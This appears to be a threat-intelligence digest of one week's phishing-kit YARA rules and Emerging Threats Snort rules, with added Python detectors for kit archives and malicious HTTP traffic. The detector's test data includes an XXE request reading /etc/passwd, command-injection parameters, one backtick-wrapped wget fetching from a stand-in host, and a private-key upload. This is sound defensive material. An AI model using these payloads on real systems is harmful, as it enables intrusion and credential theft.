Full Report
The following is the information on Yara and Snort rules (week 2, February 2025) collected and shared by the AhnLab TIP service.

2 YARA Rules

| Detection name | Description | Source |
| --- | --- | --- |
| PK_Binance_nuxt | Phishing Kit impersonating Binance | https://github.com/t4d/PhishingKit-Yara-Rules |
| PK_MondialRelay_traffyque | Phishing Kit impersonating Mondial Relay | https://github.com/t4d/PhishingKit-Yara-Rules |

20 Snort Rules (Detection name / Source)

ET POLICY Contec Health CMS8000 Patient Monitor […]
Analysis Summary
# Tool/Technique: PK_Binance_nuxt Phishing Kit
## Overview
A YARA rule that detects a specific phishing kit impersonating the Binance cryptocurrency exchange.
## Technical Details
- Type: Malware Family/Impersonation Kit (Phishing Kit)
- Platform: General Web Servers (Scripts used for phishing pages)
- Capabilities: Impersonating the Binance login interface for credential harvesting.
- First Seen: Not stated; the rule appears in the week 2, February 2025 update.
## MITRE ATT&CK Mapping
*Note: Since this is a phishing kit, the primary focus is credential access, though specific TTPs depend on the underlying kit implementation.*
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (If delivered via email)
- T1566.002 - Spearphishing Link (If a link directs to the phishing site)
## Functionality
### Core Capabilities
- **Impersonation:** Creates a webpage mimicking the legitimate Binance interface.
- **Credential Harvesting:** Captures usernames and passwords entered by victims.
### Advanced Features
- The report does not describe the kit's internals. Kits of this type are usually a cloned copy of the target's login pages plus a small set of server-side scripts that receive the submitted form data and forward it to the operator (by e-mail, a Telegram bot or a results file), often with visitor filtering to keep security scanners away from the pages.
## Indicators of Compromise
- File Hashes: N/A (The article lists the detection name, not file hashes for the kit itself)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Network traffic patterns associated with submitting credentials to an attacker-controlled server hosting this kit.
## Associated Threat Actors
- Unknown actors leveraging off-the-shelf or custom phishing kits targeting cryptocurrency users.
## Detection Methods
- Signature-based detection: run the YARA rule `PK_Binance_nuxt` over phishing-kit archives and over kit directories found in web roots, upload folders or abuse-report attachments. The t4d rules are written against the ZIP files in which kits are traded: they check the ZIP magic and then require a set of distinctive member file names, so they should be run against the archives rather than only against extracted files.
- Behavioral detection: watch certificate-transparency logs and new domain registrations for Binance lookalikes, and alert on pages that serve Binance branding from a non-Binance origin.
- YARA rules: `PK_Binance_nuxt` (Source: [https://github.com/t4d/PhishingKit-Yara-Rules](https://github.com/t4d/PhishingKit-Yara-Rules))
## Mitigation Strategies
- **Prevention:** User training on phishing that targets cryptocurrency accounts. Enforce MFA on exchange accounts, preferring phishing-resistant factors (FIDO2/passkeys): a kit that relays the login to the real site in real time captures one-time codes as easily as passwords.
- **Hardening:** DNS or web content filtering to block recently registered lookalike domains; report discovered kit domains to the brand and the hosting provider for takedown.
## Related Tools/Techniques
- `PK_MondialRelay_traffyque` (another phishing kit detected in the same report)
***
# Tool/Technique: PK_MondialRelay_traffyque Phishing Kit
## Overview
A YARA rule designed to detect a specific phishing kit used to impersonate Mondial Relay (a package delivery service).
## Technical Details
- Type: Malware Family/Impersonation Kit (Phishing Kit)
- Platform: General Web Servers (Scripts used for phishing pages)
- Capabilities: Impersonating the Mondial Relay parcel-tracking interface to collect personal and payment details, typically under the pretext of a redelivery or customs fee.
- First Seen: Not stated; the rule appears in the week 2, February 2025 update.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.002 - Spearphishing Link
## Functionality
### Core Capabilities
- **Impersonation:** Creates a webpage mimicking the Mondial Relay interface.
- **Data Capture:** Captures personal or logistical data entered by victims.
### Advanced Features
- The report does not describe the kit's internals.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators: Traffic characteristic of package delivery scams seeking user inputs.
## Associated Threat Actors
- Unknown actors leveraging phishing kits targeting logistics customers.
## Detection Methods
- Signature-based detection: run the YARA rule `PK_MondialRelay_traffyque` over phishing-kit ZIP archives and extracted kit directories, in the same way as `PK_Binance_nuxt`.
- Behavioral detection: monitor new domains and certificates containing Mondial Relay lookalike strings, and watch for SMS or e-mail lures carrying parcel-tracking links to them.
- YARA rules: `PK_MondialRelay_traffyque` (Source: [https://github.com/t4d/PhishingKit-Yara-Rules](https://github.com/t4d/PhishingKit-Yara-Rules))
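How rules in the t4d style detect a kit, as an added example that is not part of the AhnLab report or the t4d repository, serving the detection sections of both `PK_Binance_nuxt` and `PK_MondialRelay_traffyque`: the real rules test the ZIP magic with `uint32(0)` and then require a set of distinctive member file names, and the Python below reimplements that check with the standard library only, so it runs without yara-python. The rule names, member paths and archives are constructed for the demonstration; they are not the strings of either real rule.

```python
"""Phishing-kit archive scanner modelled on the t4d rule style.

Added example, not from the AhnLab report or the t4d repository. The rule
names and member paths are hypothetical; a real rule's strings are the
distinctive file names of the kit it was written for.
"""
import io
import os
import zipfile
from dataclasses import dataclass

# Local-file-header signature of a ZIP ("PK\x03\x04"); the YARA rules
# test this with uint32(0) == 0x04034b50 before looking at file names.
ZIP_MAGIC = b"PK\x03\x04"


@dataclass(frozen=True)
class KitRule:
    """A rule fires only when every required path fragment appears in the archive."""
    name: str
    required_members: tuple


# Hypothetical rules following the PK_<brand>_<distinctive string> naming scheme.
RULES = (
    KitRule("PK_ExampleExchange_demo", (
        "exchange/login.html",
        "exchange/assets/2fa.js",
        "exchange/api/send.php",
    )),
    KitRule("PK_ExampleParcel_demo", (
        "parcel/track.html",
        "parcel/card.php",
        "parcel/Telegram.php",
    )),
)


def member_names(blob: bytes):
    """Member paths of an in-memory ZIP, or None if the blob is not a ZIP."""
    if not blob.startswith(ZIP_MAGIC):
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return [info.filename for info in zf.infolist()]
    except zipfile.BadZipFile:
        return None


def match_rules(blob: bytes, rules=RULES):
    """Names of the rules whose required members are all present in the archive."""
    names = member_names(blob)
    if names is None:
        return []
    return [
        rule.name
        for rule in rules
        if all(any(req in name for name in names) for req in rule.required_members)
    ]


def scan_directory(root: str, rules=RULES):
    """Walk a directory and return {path: [rule names]} for every archive that matches."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            path = os.path.join(dirpath, filename)
            with open(path, "rb") as fh:
                matched = match_rules(fh.read(), rules)
            if matched:
                hits[path] = matched
    return hits


def build_zip(paths):
    """Construct a ZIP in memory with the given member paths (contents are irrelevant)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path in paths:
            zf.writestr(path, "<!-- placeholder -->")
    return buf.getvalue()


# Constructed samples: a complete kit, a partial one (2 of 3 files, must not
# fire, mirroring the "all of ($spec_*)" condition) and a benign site backup.
KIT_SAMPLE = build_zip([
    "exchange/login.html", "exchange/assets/2fa.js",
    "exchange/api/send.php", "exchange/assets/logo.png",
])
PARTIAL_SAMPLE = build_zip(["exchange/login.html", "exchange/assets/2fa.js"])
BENIGN_SAMPLE = build_zip(["site/index.html", "site/css/style.css"])

if __name__ == "__main__":
    for label, blob in (("kit", KIT_SAMPLE), ("partial", PARTIAL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, match_rules(blob))
```

Point `scan_directory()` at an upload folder or a web root that holds `.zip` files to triage them; a kit that was extracted in place will not match, which is exactly the limitation of ZIP-oriented rules noted above, so keep the original archives when they are available.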
## Mitigation Strategies
- **Prevention:** Educate users on parcel-delivery scams that ask for a small redelivery or customs fee or for "verification" of personal details, so that any delivery notice requesting payment through a link is treated as suspect.
- **Hardening:** E-mail and SMS filtering to block links to suspicious or recently registered lookalike domains.
## Related Tools/Techniques
- `PK_Binance_nuxt` (another phishing kit detected in the same report)
***
# Tool/Technique: Vulnerabilities Exploited via Snort Rules (February 2025)
## Overview
A compilation of network-based alerts generated by 20 Snort rules published by Emerging Threats, targeting specific known vulnerabilities (CVEs) impacting medical equipment, enterprise software, and network devices.
## Technical Details
- Type: Vulnerabilities/Exploitation Attempts (Detected via Network Signatures)
- Platform: Mixed (Healthcare, Enterprise Software, Network Appliances)
- Capabilities: Signatures cover exploitation attempts related to default credentials, Command Injection (CI), XML External Entity (XXE) injection, Path Traversal, and known backdoors.
- First Seen: Not stated; the rules appear in the week 2, February 2025 release.
## MITRE ATT&CK Mapping
Multiple techniques are covered by the various signatures. XXE has no dedicated ATT&CK technique; like the other exploits here it falls under exploitation of the exposed service:
- T1190 - Exploit Public-Facing Application (command injection, XXE, path traversal and credential-disclosure attempts against exposed web interfaces)
- T1059.004 - Command and Scripting Interpreter: Unix Shell (the router and NAS command-injection CVEs end in OS shell commands)
- T1078.001 - Valid Accounts: Default Accounts (default-credential signatures)
- T1552.004 - Unsecured Credentials: Private Keys (SSH key exfiltration over HTTP)
- T1071 - Application Layer Protocol (Onestart AI and Winos4.0 CnC check-ins)
## Functionality
### Core Capabilities (Based on Detected Exploits)
- **Command Injection:** Exploiting the web interfaces of FXC AE1021-series routers (CVE-2023-49897) and QNAP VioStor NVR devices (CVE-2023-47565).
- **XXE Injection:** Targeting Ivanti Endpoint Manager (CVE-2024-37397), Ivanti Avalanche (CVE-2024-38653), HPE Insight Remote Support (CVE-2024-53675) and the YETI threat-intelligence platform (CVE-2024-45607).
- **Credential Disclosure/Backdoors:** Attempts against D-Link routers (CVE-2021-40655, which discloses stored credentials) and the Ivanti Endpoint Manager Cloud Services Appliance backdoor (CVE-2021-44529).
- **Insecure Protocols:** HL7 traffic from Contec Health CMS8000 patient monitors in their insecure default configuration (CVE-2025-0626).
### Advanced Features
- Detection of specific malware command-and-control (CnC) traffic patterns related to **Onestart AI** and **Winos4.0 Framework**.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific traffic patterns indicating command payloads (e.g., SSH key exfiltration over HTTP, CnC checkins)
- Behavioral Indicators: Network activity matching the pattern of recognized exploitation attempts against the listed software versions.
## Associated Threat Actors
- Generic opportunistic attackers exploiting known CVEs.
- Specific threat actors may be associated with Onestart AI or Winos4.0 activity, though not explicitly named.
## Detection Methods
- Signature-based detection: Relying on the 20 specific Snort rules provided by Emerging Threats.
- Behavioral detection: Network monitoring detecting protocol anomalies or exploit signatures targeting the vulnerable software.
- YARA rules: N/A (This section focuses on Snort/Network rules)
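The signature logic behind several of these rules, as an added example that is not part of the AhnLab report or the Emerging Threats ruleset: a Snort rule's `content` and `pcre` options are pattern matches on the request, and the block below applies equivalent checks for the XXE, command-injection and private-key-over-HTTP classes listed under Core Capabilities and Network Indicators to constructed HTTP requests. The requests, addresses and patterns are assumptions made for the demonstration; the real ET rules are tighter, pinning method, URI, flow direction and byte offsets for each CVE.

```python
"""Content-match detectors for three traffic classes in the Snort summary.

Added example, not from the AhnLab report or the Emerging Threats ruleset.
The patterns are generic and illustrative; a production rule also pins the
HTTP method, URI, flow direction and byte offsets of the specific CVE.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# DOCTYPE with an internal subset that declares an external (SYSTEM/PUBLIC) entity.
XXE_RE = re.compile(rb"<!DOCTYPE[^>]*\[.*?<!ENTITY\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I | re.S)
# PEM armour of a private key: what "SSH key exfiltration over HTTP" looks like on the wire.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
# Shell metacharacters in a decoded parameter value, the usual shape of
# command injection against router/NAS CGI endpoints.
SHELL_META_RE = re.compile(r"[;&|`]|\$\(")


def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode()] = value.strip().decode(errors="replace")
    return method.decode(), target.decode(), headers, body


def inspect(raw: bytes):
    """Return the list of alert descriptions raised by one request."""
    _method, target, headers, body = parse_request(raw)
    alerts = []
    if XXE_RE.search(body):
        alerts.append("XXE: external entity declared in request body")
    if PRIVATE_KEY_RE.search(body):
        alerts.append("private key material in HTTP request body")
    # Decode query and form parameters so %3B or %60 encoding cannot hide metacharacters.
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body.decode(errors="replace"), keep_blank_values=True)
    for key, value in params:
        if SHELL_META_RE.search(value):
            alerts.append(f"shell metacharacters in parameter {key!r}")
    return alerts


# Constructed requests using RFC 5737 documentation addresses; none come from real traffic.
SAMPLES = {
    "xxe_upload": (
        b"POST /api/import HTTP/1.1\r\nHost: 192.0.2.20\r\nContent-Type: application/xml\r\n\r\n"
        b'<?xml version="1.0"?><!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<data>&xxe;</data>"
    ),
    "router_cmdi": (
        b"GET /cgi-bin/ping.cgi?host=192.0.2.1%3Bid HTTP/1.1\r\nHost: 192.0.2.30\r\n\r\n"
    ),
    "form_cmdi": (
        b"POST /cgi-bin/diag.cgi HTTP/1.1\r\nHost: 192.0.2.30\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        b"target=192.0.2.1%60wget+http%3A%2F%2F198.51.100.7%2Fx%60&count=1"
    ),
    "key_exfil": (
        b"POST /upload HTTP/1.1\r\nHost: 198.51.100.7\r\nContent-Type: application/octet-stream\r\n\r\n"
        b"-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----\n"
    ),
    "benign": b"GET /index.html?lang=en HTTP/1.1\r\nHost: 192.0.2.40\r\n\r\n",
}


def scan_samples(samples=SAMPLES):
    """Run inspect() over every sample and return {name: alerts}."""
    return {name: inspect(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, alerts in scan_samples().items():
        print(f"{name:12s} {alerts or 'clean'}")
```

The decoding step matters in practice: a rule that only matches the literal `;` or backtick in the URI misses `%3B` and `%60`, which is why Snort's HTTP inspection normalises the URI before `content` matches are applied. The metacharacter check will also fire on legitimate values containing `&` or `|`, so in a real deployment it is scoped to the vulnerable CGI paths rather than to all traffic.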
## Mitigation Strategies
- **Prevention:** Patch all systems vulnerable to the listed CVEs (Contec Health, YETI, SimpleHelp, Ivanti, QNAP, HPE, DrayTek, D-Link); where a device cannot be patched, remove it from Internet-facing and user-accessible networks.
- **Hardening:** Confine patient monitors to the segment of their central monitoring station and block their outbound connections to anything else, which also neutralises the insecure default HL7 destination; egress filtering with DLP inspection for private-key material (PEM `-----BEGIN ... PRIVATE KEY-----` blocks) leaving over HTTP; segment medical devices and other critical infrastructure from general user networks.
## Related Tools/Techniques
- XXE exploitation payloads (external entity declarations that read local files or trigger outbound requests), which the XXE signatures match on.
- C2 signatures for the Onestart AI and Winos4.0 malware families.